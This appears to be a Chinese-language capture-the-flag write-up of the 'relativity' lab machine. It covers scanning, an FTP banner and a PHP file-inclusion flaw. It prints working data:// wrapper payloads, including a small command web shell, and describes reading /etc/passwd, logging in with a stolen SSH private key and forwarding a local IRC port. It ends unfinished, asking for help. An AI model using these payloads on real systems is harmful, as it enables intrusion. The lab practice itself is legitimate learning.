relativity (v1.0.1)靶机
arp-scan -l 扫描靶机IP地址
nmap -sV -Pn -A x.x.x.242 nmap 查看开放的端口
访问80端口
dirb 进行扫描,无果
FTP登录试试
使用anonymous登录失败,不过我注意到一个banner
220 Welcome to Relativity FTP (mod_sql)
在浏览器打开这个目录
查看页面源代码,好像有文件包含漏洞
我尝试了一些本地文件包含,但它没有让我任何地方。为了进入下一步,我需要一些外部阅读和灵感。对于漏洞利用,我们可以利用PHP的流包装器:PHP附带了许多用于各种URL样式协议的内置包装器,用于文件系统函数,如fopen(),copy(),file_exists()和filesize(),这里面有篇文章的攻击应用
# simple RFI page=data://text/plain, <?php system("whoami");?> # base64 encoded RFI page=data://text/plain;base64,PD9waHAgc3lzdGVtKCJ3aG9hbWkiKTs/Pg== # mini shell page=data://text/plain,<?php system($_GET[cmd]);?>&cmd=id # base64 + URL encoded mini shell (didn't work without URL encoding) page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOz8%2B&cmd=id
执行成功
查看passwd文件
mauk目录有个.SSH文件夹
进入可以看到有个公钥和私钥
私钥,使用私钥登录mauk账号
找到/opt下有个东西
查看端口开放情况
本地开放了6667端口
IRC(Internet Relay Chat的缩写,“因特网中继聊天”)是一种透过网络的即时聊天方式。其主要用于群体聊天,但同样也可以用于个人对个人的聊天。IRC使用的服务器端口有6667(明文传输,如irc://irc.freenode.net)、6697(SSL加密传输,如ircs://irc.freenode.net:6697)等。
靶机上面没有nc命令,不能做端口转发,那就用SSH做端口转发
kali扫描本地4444端口
之后就不会了,请求大佬指导。